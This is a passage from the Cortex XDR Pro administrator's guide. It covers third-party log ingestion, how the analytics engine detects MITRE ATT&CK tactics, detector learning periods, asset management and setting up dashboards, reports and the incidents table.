
Third-party firewall logs If you use non-Palo Alto Networks firewalls—Check

Point, Fortinet, Cisco ASA—or in addition to or instead
of Palo Alto Networks firewalls, you can set up a syslog
collector to facilitate log and alert ingestion. By sending
your firewall logs to Cortex XDR, you can increase
detection coverage and take advantage of Cortex XDR
analysis capabilities. When Cortex XDR analyzes your
firewall logs and detects anomalous behavior, it raises
an alert.

Third-party authentication service logs If you use an authentication service—Microsoft Azure

AD, Okta, or PingOne—you can set up log collection to
ingest authentication logs and data into authentication
stories.

Windows Event Collector logs The Windows Event Collector (WEC) runs on the broker
VM collecting event logs from Domain Controllers
(DCs). The analytics engine can analyze these event logs
to raise alerts such as for credential access and defense
evasion.

Coverage of the MITRE Attack Tactics

Network attacks follow predictable patterns. If you interfere with any portion of this pattern, the attack will
be neutralized.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Analytics 391

© 2020 Palo Alto Networks, Inc.
 The analytics engine can alert on any of the following attack tactics as defined by the MITRE ATT&CK™
knowledge base of tactics.

Tactic Description

Execution After attackers gain a foothold in your network,

they can use various techniques to execute
malicious code on a local or remote endpoint.
The Cortex XDR app detects malware and
grayware on your network using a combination of
network activity, Pathfinder data collector of your
unmanaged endpoints, endpoint data from your
Cortex XDR agents, and evaluation of suspicious
files using the WildFire® cloud service.

Persistence To carry out a malicious action, an attacker can try

techniques that maintain access in a network or on
an endpoint. An attacker can initiate configuration
changes—such as a system restart or failure—that
require the endpoint to restart a remote access
tool or open a backdoor that allows the attacker to
regain access on the endpoint.

Discovery After an attacker has access to a part of your

network, discovery techniques to explore and
identify subnets, and discover servers and the
services that are hosted on those endpoints.
The idea is to identify vulnerabilities within your
network.
The app detects attacks that use this tactic by
looking for symptoms in your internal network
traffic such as changes in connectivity patterns
that including increased rates of connections,
failed connections, and port scans.

Lateral Movement To expand the footprint inside your network,

and attacker uses lateral movement techniques
to obtain credentials to gain additional access to
more data in the network.

392 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Analytics

© 2020 Palo Alto Networks, Inc.
 Tactic Description
The analytics engine detects attacks during this
phase by examining administrative operations
(such as SSH, RDP, and HTTP), file share access,
and user credential usage that is beyond the norm
for your network. Some of the symptoms the app
looks for are increased administrative activity,
SMB usage, and remote code execution.

Command and Control The command and control tactic allows an attacker
to remotely issue commands to and endpoint
and receive information from it. The analytics
engine identifies intruders using this tactic by
looking for anomalies in outbound connections,
DNS lookups, and endpoint processes with bound
ports. The app is looking for unexplained changes
in the periodicity of connections and failed DNS
lookups, changes in random DNS lookups, and
other symptoms that suggest an attacker has
gained initial control of a system.

Exfiltration Exfiltration tactics are techniques to receive

data from a network, such as valuable enterprise
data. The app seeks to identify it by examining
outbound connections with a focus on the volume
of data being transferred. Increases in this volume
are an important symptom of data exfiltration.

Analytics Detection Time Intervals

The analytics engine for Cortex XDR retrieves logs from Cortex Data Lake to understand the normal
behavior (creates a baseline) so that it can raise alerts when abnormal activity occurs. This analysis is highly
sophisticated and performed on more than a thousand dimensions of data. Internally, the Cortex XDR app
organizes its analytics activity into algorithms called detectors. Each detector is responsible for raising an
alert when worrisome behavior is detected.
To raise alerts, each detector compares the recent past behavior to the expected baseline by examining
the data found in your logs. A certain amount of log file time is required to establish a baseline and
then a certain amount of recent log file time is required to identify what is currently happening in your
environment.
There are several meaningful time intervals for Cortex XDR Analytics detectors:

Time Interval Description

Learning Period The shortest amount of log file time before the
app can raise an alert. This is typically the time
from when a detector first starts running and when
you see an alert but, in some cases, detectors
pause after an upgrade as they enter a new
learning period.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Analytics 393

© 2020 Palo Alto Networks, Inc.
 Time Interval Description
Most but not all detectors will wait until they have
a <learning period> amount of time before they
run. This learning period exists to give the detector
enough data to establish a baseline, which in turn
helps to avoid false positives.
The learning period is also referred to as the
profiling or waiting period and, informally, it is also
referred to as soak time.

Test Period The amount of logging time that a detector uses to

determine if unusual activity is occurring on your
network. The detector compares test period data
to the baseline created during the training period,
and uses that comparison to identify abnormal
behavior.

Training Period The amount of logging time that the detector

requires to establish a baseline, and to identify the
behavioral limits beyond which an alert is raised.
Because your network is not static in terms of
its topology or usage, detectors are constantly
updating the baselines that they require for their
analytics. For this update process, the training
period is how far back in time the detector goes to
update and tune the baseline.
This period is also referred to as the baseline
period.

When establishing a baseline,

detectors compute limits beyond
which network activity will require
an alert. In some cases, detectors
do not compute baseline limits;
instead they are predetermined
by Cortex XDR engineers. The
engineers determine the values
used for predetermined limits using
statistical analysis of malicious
activity recorded worldwide. The
engineers routinely perform this
statistical analysis and update the
predetermined limits as needed
with each release of the Cortex
XDR.

Deduplication Period The amount of time in which additional alerts

for the same activity or behavior are suppressed
before Cortex XDR raises another Analytics alert.

394 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Analytics

© 2020 Palo Alto Networks, Inc.
 These time periods are different for every Cortex XDR Analytics detector. The actual amount of logging
data (measured in time) required to raise any given Cortex XDR Analytics alert is identified in the Cortex
XDR Analytics Alert Reference.

Analytics Alerts and Analytics BIOCs

To raise a typical Analytics alert, the Analytics Engine establishes a baseline of activity and analyzes
behavior patterns over time. The engine raises the alert when it detects suspicious behaviors (multiple
events) that deviate from the baseline.
In addition to standard Analytics alerts, there is another category of alerts for Analytics BIOCs (behavioral
indicators of compromise). In contrast to standard Analytics alerts, Analytics BIOCs—sometimes referred to
informally as ABIOCs—indicate a single event of suspicious behavior with an identified chain of causality.
To identify the context and chain of causality, ABIOCs leverage user, endpoint, and network profiles.
The profile is generated by the Analytics Engine and can be based on a simple statistical profile or a more
complex machine-learning profile. Cortex XDR tailors each ABIOC to your specific environment after
analyzing your logs and data sources. Palo Alto Networks threat researchers continually tune and deliver
new ABIOCs with content updates.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Analytics 395

© 2020 Palo Alto Networks, Inc.
396 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Analytics
Asset Management
> About Asset Management
> Configure Your Network Parameters
> Manage Your Network Assets

397
398 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Asset Management
© 2020 Palo Alto Networks, Inc.
About Asset Management
Network asset visibility is a crucial investigative tool in discovering rogue devices in your network and
preventing malicious activity. Understanding how many managed and unmanaged assets are part of your
network provides you with vital information to better assess your security exposure and track network
communication.
Cortex XDR Asset Management provides an accurate representation of your network assets by collecting
and analyzing the following network resources:
• User-defined IP Address Ranges and Domain Names associated with your internal network
• EDR data collected by Firewall Logs
• Cortex XDR Agent Logs
• Broker VM Network Mapper
• Pathfinder Data Collector
With the data aggregated by Cortex XDR Asset Management you can locate manage your assets more
effectively and reduce the amount of research required to:
• Distinguish between assets managed and unmanaged by a Cortex XDR Agent.
• Identify assets that are part of your internal network.
• Track network data communications from within and outside your network.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Asset Management 399

© 2020 Palo Alto Networks, Inc.
Configure Your Network Parameters
In order to track and identify assets in your network, you need to define your internal IP address ranges and
domain names to enable Cortex XDR to analyze, locate, and display assets.

Define IP Address Ranges

STEP 1 | In Cortex XDR, navigate to Assets > Network Configuration > IP Address Ranges.

STEP 2 | Define an IP Address Range

By default, Cortex XDR creates Private Network ranges that specify reserved industry approved ranges.
Private Network ranges are marked with a icon and can only have the name edited.
To Add New Range select either:
• Create New
• In the Create IP Address Rage pop-up, enter the IP address Name and IP Address Range or CIDR
values.

You can add a range which is fully contained in an existing range, however you
cannot add a new range which partially intersect with another range.

The range names you define will appear when investigating the network related events within the
Cortex XDR console.
• Save your definitions.
• Upload from File
• In the Upload IP Address Ranges pop-up, drag and drop or search for a CSV file listing the IP
address ranges. Download example file to view the correct format.
• Add your list of IP address ranges.

STEP 3 | Review your IP address ranges.

After you named and defined your IP address ranges, review the following information:

The IP Address Ranges table displays the following fields:

• Range Name—Name of the IP address range you define.
• First IP Address—First IP address value of the defined range.

400 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Asset Management

© 2020 Palo Alto Networks, Inc.
 • Last IP Address—Last IP address value of the defined range.
• Active Assets—Number of assets located within the defined range that are have reported Cortex
XDR Agent logs or appeared in your Network Firewall Logs.
• Active Manged Assets—Number of assets located within the defined range that are reported Cortex
XDR Agent logs.
• Modified By—User name of user who last changed the range.
• Modification Time—Timestamp of when this range was last changed.

STEP 4 | Manage your IP address ranges.

In the IP Address Ranges table, locate your range and select:
• Edit range—Edit the IP address configurations. Changes made will effect the Broker VM Network
Mapper.
• Delete range—Delete the IP address range.

Define Domain Names

STEP 1 | In Cortex XDR, navigate to Assets > Network Configuration > Internal Domain Suffixes.

STEP 2 | In the Internal Domain Suffixes section, +Add the domain suffix you want to include as part of
your internal network. For example, acme.com.

STEP 3 | Select to add to the Domains List.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Asset Management 401

© 2020 Palo Alto Networks, Inc.
Manage Your Network Assets
The Assets page provides a central location from which you can view and investigate information relating to
assets in your network. Using your defined internal network configurations, Broker VM Network Mapper,
Cortex XDR agent, EDR data collected from firewall logs, and logs from third-party vendors, Cortex XDR
is able to aggregate and display a list of all the assets located within your network according to their IP
address.
To easily investigate your assets:

STEP 1 | Navigate to Assets > Asset Management > Assets.

STEP 2 | Filter and review your assets.

By default the Assets table is filtered according to unmanaged assets over the last 7 days. The following
table describes both the default and optional fields in the table, and the network prerequisites required
by Cortex XDR to retrieve the data:

Field Description Prerequisites

AGENT ID ID of the agent installed on the

asset. Cortex XDR only displays
agents that send EDR data
captured in the firewall logs.

AGENT INSTALLED Whether or not the asset has

an agent installed.

AGENT VERSION Version of the agent installed

on the asset. Cortex XDR only
displays agents that send EDR
data captured in the firewall
logs.

COLLECTOR RUNNING Whether or not a Pathfinder

Data Collector is currently
running on the asset.

FIRST TIME SEEN Timestamp of when the IP

address was first seen in the
logs.

402 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Asset Management

© 2020 Palo Alto Networks, Inc.
Field Description Prerequisites

HOST NAME Host name of the asset, if The asset requires at least one
available. of the following:
• An installed Cortex XDR
agent
• A running Cortex XDR
collector
• A Global Protect client 9.1
or a later release, configured
to send HIP Match logs
• Associated DHCP logs
covering this asset are sent
to Cortex XDR

IP ADDRESS IP address related to the last

asset associated with it.

LAST TIME SEEN Timestamp of when the IP

address was last seen in the
logs.

MAC ADDRESS Mac address of the asset. The asset requires at least one
of the following:
• An installed Cortex XDR
agent
• A running Cortex XDR
collector
• For Mac endpoints, a Global
Protect client 9.1 or a later
release, configured to send
HIP Match logs
• Associated DHCP logs
covering this asset are sent
to Cortex XDR

MAC ADDRESS VENDOR Vendor name of the Mac The asset requires at least one
address of the asset. of the following:
• An installed Cortex XDR
agent
• A running Cortex XDR
collector
• For Mac endpoints, a Global
Protect client 9.1 or a later
release, configured to send
HIP Match logs
• Associated DHCP logs
covering this asset are sent
to Cortex XDR

PLATFORM Platform running on the asset. The asset requires at least one
of the following:

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Asset Management 403

© 2020 Palo Alto Networks, Inc.
 Field Description Prerequisites
• An installed Cortex XDR
agent
• A running Cortex XDR
collector
• A Global Protect client 9.1
or a later release, configured
to send HIP Match logs

RANGE NAMES Name of the IP address range

allocated to the IP address.

You can export your filtered results to a TSV file.

STEP 3 | Investigate an asset.

Locate an IP address, right-click and select to:
• Open asset view—Pivot to the Asset View to view insights collected from an endpoint with an agent
installed.
Open IP View—Pivot to the IP Address View to view details of the associated IP address from an
endpoint without an agent installed.

The default filter in the table shows only non-agent assets.

• View agent details—Pivot to the Endpoints table filtered according to the agent ID. Choose whether
to open the view in a new tab or the same tab. This option is available only for assets with a Cortex
XDR agent installed.
• Open in Quick Launcher—Open the Quick Launcher search results for the IP address.
• Remove Collector—Remove the Pathfinder Data Collector. Only available if a collector is status is In
Process.

404 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Asset Management

Monitoring
> Cortex XDR Dashboard
> Monitor Cortex XDR Incidents
> Monitor Administrative Activity
> Monitor Agent Activity
> Monitor Agent Operational Status

405
406 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring
© 2020 Palo Alto Networks, Inc.
Cortex XDR Dashboard
The Dashboard screen is the first page you see in the Cortex XDR app when you log in.

The dashboard is comprised of Dashboard Widgets (2) that summarize information about your endpoint
in graphical or tabular format. You can customize Cortex XDR to display Predefined Dashboards or
create your own custom dashboard using the dashboard builder. You can toggle between your available
dashboards using the dashboard menu (1).
In addition, the dashboard provides a color theme toggle (3) that enables you to switch the interface colors
between light and dark.

Dashboard Widgets
Cortex XDR provides the following list of widgets to help you create dashboards and reports displaying
summarized information about your endpoints.
Cortex XDR sorts widgets in the Cortex XDR app according to the following categories:
• Agent Management Widgets
• Incident Management Widgets
• Investigation Widgets
• User Defined Widgets
• Asset Widgets
• XQL Search
• Custom Widget
• System Monitoring
• Host Insights

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring 407

© 2020 Palo Alto Networks, Inc.
 Agent Management Widgets

Widget Name Description

Agent Content Version Breakdown Displays the total number of registered Cortex
XDR agents and the distribution of agents by
content update version.

Agent Status Breakdown Displays the total number of Cortex XDR agents
by the agent status.

Agent Version Breakdown Displays the total number of registered Cortex

XDR agents and the distribution of agents by
agent version.

Number of Installed Agents Displays a timeline of the number of agents

installed on endpoints over the last 24 hours, 7
days, or 30 days.

Operating System Type Distribution Displays the total number of registered agents
and their distribution according to the operating
system.

Incident Management Widgets

Widget Name Description

Incidents By Assignee Displays the top 10 users that are assigned the
highest number of incidents over the last 30
days. For each assignee, the widget displays the
distribution of aged and open incidents. Aged
incidents have not been modified in seven days.
Select an assignee to open the incidents table
filtered to display incidents that are assigned to
the selected assignee.

Incidents By Status Provides a summary of the total current number of

open incidents according to status. Click a status
to open a filtered view of the incidents.

408 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring

© 2020 Palo Alto Networks, Inc.
 Investigation Widgets

Widget Name Description

Data Usage Breakdown Displays a timeline of the consumption of Cortex

XDR data in TB. Hover over the graph to see the
amount at a specific time.

Detection By Actions Displays the top five actions performed on alerts

or incidents. In the upper right corner:
• Toggle between alerts and incidents
• Select to view the number of alert/incidents
per action over the last 24 hours, 7 days, or 30
Days

Detections By Category Displays the top five categories of alerts or

incidents. In the upper right corner:
• Toggle between alerts and incidents
• Select to view the number of alert/incidents
per category over the last 24 hours, 7 days, or
30 Days

Detection By Source Displays the top five sources of alerts or incidents.

In the upper right corner:
• Toggle between alerts and incidents
• Select to view the number of alert/incidents
per source over the last 24 hours, 7 days, or 30
Days

Open Incidents by Severity Displays the total open incidents over the last 30
days according to severity.
Select a severity to open a filtered view of
incidents by the selected severity.

Response Action Breakdown Displays the top response actions taken in the
Action Center over the last 24 hours, 7 days, or 30
Days.

Top Hosts Displays the top ten hosts with the highest
number of incidents in order of severity over the
last 30 days. Incidents are color-coded: red for
high severity and yellow for medium severity.
Click a host to open a filtered view of all open
incidents for the selected host.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring 409

© 2020 Palo Alto Networks, Inc.
 Widget Name Description

Top Incidents Displays the top ten current incidents with the
highest number of alerts according to severity over
the last 30 days. Alerts are color-coded; red for
high and yellow for medium.
Click a severity to open a filtered view of all open
alerts for the selected incident.

Total Incidents Displays a timeline of incidents including the

number of aged versus open incidents. Aged
incidents have not been modified in seven days.
Select the time scope in the upper right to view
the number of open incidents over the last 24
hours, 7 days, or 30 days.
Hover over the graph to view the number of open
incidents on a specific day.

User Defined Widgets

Widget Name Description

Free Text Displays a text box allowing to insert free text.

Header Displays a title containing the free text. For

example, name and description of a report or
dashboard, customer name, tenant ID, or date.

Asset Widgets

Widget Name Description

Managed Assets vs Unmanaged Assets Displays a detailed breakdown of your active

managed and unmanaged assets.

Agent Status Breakdown Displays the total number of Cortex XDR agents
by the agent status.

Agent Version Breakdown Displays the total number of registered Cortex

XDR agents and the distribution of agents by
agent version.

410 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring

© 2020 Palo Alto Networks, Inc.
Widget Name Description

Number of Installed Agents Displays a timeline of the number of agents

installed on endpoints over the last 24 hours, 7
days, or 30 Days.

Operating System Type Distribution Displays the total number of

registered agents and their distribution according
to the operating system.

XQL Search

Widget Name Description

XQL Query Displays visualization for the results of an XQL

Search query over the past 24 hours, 7 days, or 30
days. By default, the query runs every 24 hours .
Update Now to rerun the query immediately.
See the XQL Language Reference for detailed
information about creating an XQL Search query.

Custom Widget

Widget Name Description

Custom Widget Displays visualization for the results of an XQL

Search.
See the XQL Language Reference for detailed
information about creating an XQL Search query.

System Monitoring

Widget Name Description

Ingestion Rate Displays the rate at which Cortex XDR consumes

data ingested from a specific vendor or product
over the past 24 hours, 7 days, or 30 days. All
ingestion rates are measured by bytes per second.

Daily Consumption A breakdown comparing the product/vendor

consumption versus your allowed daily limit over
the past 24 hours, displayed in UTC.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring 411

© 2020 Palo Alto Networks, Inc.
 Widget Name Description
The Daily limit is calculated according to your
Cortex XDR license type: Amount of TB / 30 days

If the ingestion rate has exceeded

your daily limit, Cortex XDR will
issue a notification through the
Notification Center and email. After
3 continuous days of exceeding
the ingestion rate, Cortex XDR will
stop ingesting data that exceeds
the daily limit.

Detailed Ingestion Breakdown of ingestion data per vendor or

product over the past 30 days.
Filter the following information for each source:
• Product/Vendor—Name of the selected
product or vendor.
• First Seen—Timestamp of when product/
vendor were first ingested.
• Last Seen—Timestamp of when product/vendor
were last ingested.
• Last Day Ingested—Amount of data ingested
over the past 30 days.
• Current Day Ingested—Amount of data
ingested over the past 24 hours.

Host Insights
(Requires a Cortex XDR Host Insights Add-on)

Widget Name Description

CVEs By Severity Provides a summary of the total number of

existing CVEs in your network according to critical,
high, medium, and low severity.
Click a severity to open a filtered view of the
CVEs.

Top CVEs By Affected Endpoints Displays the top Critical, High, and Medium
severity CVEs currently existing in your network
according to the total number of endpoints
affected by each CVE.
Click a CVE to open a filtered view of all affected
endpoints.

412 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring

© 2020 Palo Alto Networks, Inc.
 Widget Name Description

Top Vulnerable Applications Displays the most vulnerable applications with

the highest number of Critical, High, and Medium
severity CVEs. Cortex XDR calculates the
vulnerabilities for different application versions
running on different operating systems.
Click an application to open a filtered view of all
existing CVEs for the selected application.

Top Vulnerable Endpoints Displays the most vulnerable endpoints with the
highest number of critical, high, and medium CVEs.
Click a host to open a filtered view of all existing
CVEs for the selected host.

Vulnerabilities On All Endpoints Over Time Displays CVEs over time across your network.
Select the time scope in the upper right to view
the number of CVEs over the last 24 hours, 7 days,
or 30 Days.
Hover over the graph to view the number of
existing CVEs on a specific day.

Manage Your Widget Library

The widget library displays predefined widgets and user-created custom widgets. From the widget library,
you can:
• Create and edit custom widgets based on XQL Search queries.
• Search for custom and predefined widgets..
• Edit existing custom widgets.

STEP 1 | In Cortex XDR, navigate to Reporting > Widget Library.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring 413

© 2020 Palo Alto Networks, Inc.
 • Create and edit custom widgets based on XQL Search queries.

1. In the widget menu, Create custom XQL widget.

2. Enter a widget Name and optional Description.
3. Create an XQL query. Select XQL Helper to view XQL search and schema examples.
4. Generate the XQL query to display the search results.

XQL queries generated from the widget library do not appear in the Query Center. The
results are used only for creating the custom widget.
5. In the Widget section, define how you want to visualize the results.
6. After you are happy with the query parameters and visualization definitions, Save widget.
The custom widget appears in the list of existing widgets.
• Search for custom and predefined widgets.

414 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring

© 2020 Palo Alto Networks, Inc.
 1. Search for a widget or Show widgets according to the type of category.
2. Select a widget type to display the widget graph type and parameters. By default, Cortex XDR
displays the widget with Mock Data. Toggle to display your current Real Data.
• Edit existing custom widgets.
1. Locate a custom widget.
2. Select Update widget ( ) to edit the widget or Delete widget from library.

Editing an existing widget affects all dashboards that include the widget and future
generated reports.

STEP 2 | (Optional) Include the widgets listed in the widget library in your custom dashboards and
reports.

Predefined Dashboards
Cortex XDR comes with predefined dashboards that display widgets tailored to the dashboard type. You
can select any of the predefined dashboards directly from the dashboard menu in Reporting > Dashboard.
You can also select and rename a predefined dashboard in the Dashboard Builder available by clicking +
New Dashboard. The types of dashboards that are available to you depend on your license type but can
include:
• Agent Management Dashboard
• Incident Management Dashboard
• Security Manager Dashboard
• Data Ingestion Dashboard

Agent Management Dashboard

The Agent Management Dashboard displays at-a-glance information about the endpoints and agents in
your deployment.

Support for the Agent Management Dashboard requires either a Cortex XDR Prevent or
Cortex XDR Pro per Endpoint license.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring 415

© 2020 Palo Alto Networks, Inc.
 The dashboard is comprised of the following Dashboard Widgets:
• Agent Status Breakdown
• Agent Content Version Breakdown (Top 5)
• Agent Version Breakdown (Top 5)
• Operating Type Distribution
• Top Hosts (Top 10 | Last 30 days)

Incident Management Dashboard

The Incidents Management Dashboard provides a graphical summary of incidents in your environment, with
incidents prioritized and listed by severity, assignee, incident age, and affected hosts.
The dashboard is comprised of the following Dashboard Widgets:
• Incidents by Assignee (Top 10 | Last 30 days)
• Open Incidents
• Open Incidents By Severity (Last 30 days)
• Top Hosts (Top 10 | Last 30 days)
• Top Incidents (Top 10)
To filter a widget to display only incidents that match incident starring policies, select the star in the right
corner. A purple star indicates that the widget is displaying only starred incidents. The starring filter is
persistent and will continue to show the filtered results until you clear the star.

416 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring

© 2020 Palo Alto Networks, Inc.
Security Manager Dashboard

The Security Manager Dashboard widgets display general information about Cortex XDR incidents and
agents.

The Security Manager Dashboard requires either a Cortex XDR Prevent or Cortex XDR Pro
per Endpoint license.

The dashboard is comprised of the following Dashboard Widgets:

• Agent Status Breakdown
• Agent Version Breakdown (Top 5)
• Incidents by Assignee (Top 10 | Last 30 days)
• Open Incidents By Severity (Last 30 days)
• Top Incidents (Top 10)
• Total Incidents
For incident-related widgets you can also filter the results to display only incidents that match incident
starring policies. To apply the filter, select the star in the right corner of the widget. A purple star indicates
that the widget is displaying only starred incidents. The starring filter is persistent and will continue to show
the filtered results until you clear the star.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring 417

© 2020 Palo Alto Networks, Inc.
 Data Ingestion Dashboard

The Data Ingestion dashboard displays an overview and detailed information regarding the type and amount
of data is ingested by Cortex XDR filtered by different resolutions. For example, Syslog Collector, Check
Point logs, and authentication logs.
The dashboard is comprised of the following Dashboard Widgets:
• Ingestion Rate—Displays your data ingestion rate, measured in bytes/ sec, over the past 24 hours, 7
days, or 30 days filtered according to the type of product, vendor, or device.
• Daily Consumption—Stacked graphs measuring your daily data consumption, according to either
product, vendor, or device type, versus your daily consumption limit. Each bar indicates a 24 hour range
over the past 14 days. Cortex XDR measures and enforces the 24 hour rage according to UTC, however
the graph displays the 24 hour rage according to the selected tenant timezone.
• Detailed Ingestion—Table listing when a product, vendor, or device was first and last seen, and the
amount of data ingested over the last 24 hour range and the current 24 hours. Detailed ingestion for the
current 24 hours is updated in 5 minute intervals.

Build a Custom Dashboard

To create purposeful dashboards, you must consider the information that you and other analysts find
important to your day to day operations. This consideration guides you in building a custom dashboard.
When you create a dashboard, you can select widgets from the widget library and choose their placement
on the dashboard.

STEP 1 | Select Reporting > Dashboards Manager > + New Dashboard.

STEP 2 | Enter a unique Dashboard Name and an optional Description of the dashboard.

STEP 3 | Choose the Dashboard Type.

418 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring

© 2020 Palo Alto Networks, Inc.
 You can use an existing dashboard as a template, or you can build a new dashboard from scratch.

STEP 4 | Click Next.

STEP 5 | Customize your dashboard.

1. To get a feel for how the data will look, Cortex XDR provides mock data. To see how the dashboard
would look with real data in your environment, you can use the toggle above the dashboard to use
Real Data.
2. Drag and drop widgets from the widget library to their desired position.

3. For agent-related widgets, apply an endpoint scope, if desired.

Applying an endpoint scope restricts the results to only the endpoints that belong to the group.
To apply the scope, select the menu on the top right corner of the widget and then select Groups.
Search for and select one or more endpoint groups for which you want to set the widget scope.
4. For incident-related widgets, select the star to display only incidents that match an incident starring
configuration on your dashboard, if desired. A purple star indicates that the widget is displaying only
starred incidents (see Manage Incident Starring).
5. Repeat the process to continue adding additional widgets to the dashboard. If necessary, you can also
remove unwanted widgets from the dashboard. To remove a widget, select the menu in the top right
corner, and Remove widget.

STEP 6 | When you have finished customizing your dashboard, click Next.

STEP 7 | To set the custom dashboard as your default dashboard when you log in to Cortex XDR,
Define as default dashboard.

STEP 8 | To keep this dashboard visible only for you, select Private.
Otherwise, the dashboard is public and visible to all Cortex XDR app users with the appropriate roles to
manage dashboards.

STEP 9 | Generate your dashboard.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring 419

© 2020 Palo Alto Networks, Inc.
Manage Dashboards
From the Reporting > Dashboards Manager, you can view all custom and default dashboards. From the
Dashboards Manager, you can also delete, edit, duplicate, disable, and perform additional management
actions on your dashboards.
To manage an existing dashboard, right click the dashboard and select the desired action.
• Delete - Permanently delete a dashboard.
• Edit - Edit an existing dashboard. You cannot edit the default dashboards provided by Palo Alto
Networks, but you can save it as a new dashboard.
• Save as new - Duplicate an existing template.
• Disable - Temporarily disable a dashboard. If the dashboard is public, this dashboard is also removed for
all users.
• Set as default - Make the dashboard the default dashboard that displays when you (and other users, if
the dashboard is public) log in to Cortex XDR.
• Save as report template - Save a report as a template.

Run or Schedule Reports

There are two ways to create a report template:
• Run a Report Based on a Dashboard
• Create a Report from Scratch

Run a Report Based on a Dashboard

STEP 1 | Select Reporting > Dashboards Manager.

STEP 2 | Right-click the dashboard from which you want to generate a report, and select Save as report
template.

STEP 3 | Enter a unique Report Name and an optional Description of the report, then Save the
template.

STEP 4 | Select Reporting > Report Templates.

STEP 5 | Run the report.

You can either Generate Report to run the report on-demand, or you can Edit the report template to
define a schedule.

STEP 6 | After your report completes, you can download it from the Reporting > Reports page.

Create a Report from Scratch

STEP 1 | Select Reporting > Report Templates > + New Template.

STEP 2 | Enter a unique Report Name and an optional Description of the report.

STEP 3 | Select the Data Timeframe for your report.

You can choose Last 24H (day), Last 7D (week), Last 1M (month), or you can choose a custom
timeframe.

420 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring

© 2020 Palo Alto Networks, Inc.
 Custom timeframe is limited to one month.

STEP 4 | Choose the Report Type.

You can use an existing template, or you can build a new report from scratch.

STEP 5 | Click Next.

STEP 6 | Customize your report.

To get a feel for how the data will look, Cortex XDR provides mock data. To see how the report would
look with real data in your environment, you can use the toggle above the report to use Real Data.
Select Preview A4 to view how the report is displayed in an A4 format.
Drag and drop widgets from the widget library to their desired position.
If necessary, remove unwanted widgets from the template. To remove a widget, select the menu in the
top right corner, and select Remove widget.
For incident-related widgets, you can also select the star to include only incidents that match an incident
starring configuration in your report. A purple star indicates that the widget is displaying only starred
incidents.

STEP 7 | When you have finished customizing your report template, click Next.

STEP 8 | If you are ready to run the report, select Generate now.

STEP 9 | To run the report on a regular Schedule, you can specify the time and frequency that Cortex
XDR will run the report.

STEP 10 | Enter an optional Email Distribution or Slack workspace to send a PDF version of your report.
Select Add password for e-mailed report to set a password encryption.

STEP 11 | Save Template.

STEP 12 | After your report completes, you can download it from the Reporting > Reports page.

CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring 421

© 2020 Palo Alto Networks, Inc.
Monitor Cortex XDR Incidents
The Incidents table lists all incidents in the Cortex XDR app.

An attack can affect several hosts or users and raises different alert types stemming from a single event. All
artifacts, assets, and alerts from a threat event are gathered into an Incident.
The logic behind which alert the Cortex XDR app assigns to an incident is based on a set of rules which
take into account different attributes. Examples of alert attributes include alert source, type, and time
period. The app extracts a set of artifacts related to the threat event, listed in each alert, and compares it
with the artifacts appearing in existing alerts in the system. Alerts on the same causality chain are grouped
with the same incident if an open incident already exists. Otherwise, the new incoming alert will create
a new incident. The Incidents table displays all incidents including the incident severity to enable you to
prioritize, track, and update incidents. For additional insight into the entire scope and cause of an event,
you can view all relevant assets, suspicious artifacts, and alerts within the incident details. You can also
track incidents, document the resolution, and assign analysts to investigate and take remedial action. Select
multiple incidents to take bulk actions on incidents.
The following table describes both the default and additional optional fields that you can view in the
Incidents table and lists the fields in alphabetical order.

Field Description

Check box to select one or more incidents on which to perform

the following actions.
• Assign incidents to an analyst in bulk
• Change the status of multiple incidents
• Change the severity of multiple incidents

Alerts Breakdown The total number of alerts and number of alerts by severity.

Assignee Email Email address associated with the assigned incident owner.

Assigned To The user to which the incident is assigned. The assignee

tracks which analyst is responsible for investigating the
threat. Incidents that have not been assigned have a status of
Unassigned.

Creation Time The time the first alert was added to a new incident.

422 CORTEX XDR™ PRO ADMINISTRATOR’S GUIDE | Monitoring

© 2020 Palo Alto Networks, Inc.
Field Description

Hosts The number of hosts affected by the incident. Right-click

the host count to view the list of hosts grouped by operating
system.

Incident Description The description is generated from the alert name from the
first alert added to the incident, the host and user affected, or
number of users and hosts affected.

Incident ID A unique number to identify the incident.

Incident Name A user-defined incident name.

Incident Sources List of sources that raised high and medium severity alerts in
the incident.

Last Updated The last time a user took an action or an alert was added to the
incident.

Resolve Comment The user-added comment when the user changes the incident
status to a Resolved status.

Score Displays the score defined by the incident scoring rule.

Severity The highest alert in the incident or the user-defined severity.

Starred The incident includes alerts that match your incident

prioritization policy. Incidents that have alert matches include
a star by the incident name in the Incident details view and a
value of Yes in this field.

Status Incidents have the status set to New when they are generated.
To begin investigating an incident, set the status to Under
Investigation. The Resolved status is subdivided into resolution
reasons:
• Resolved - Threat Handled
• Resolved - Known Issue
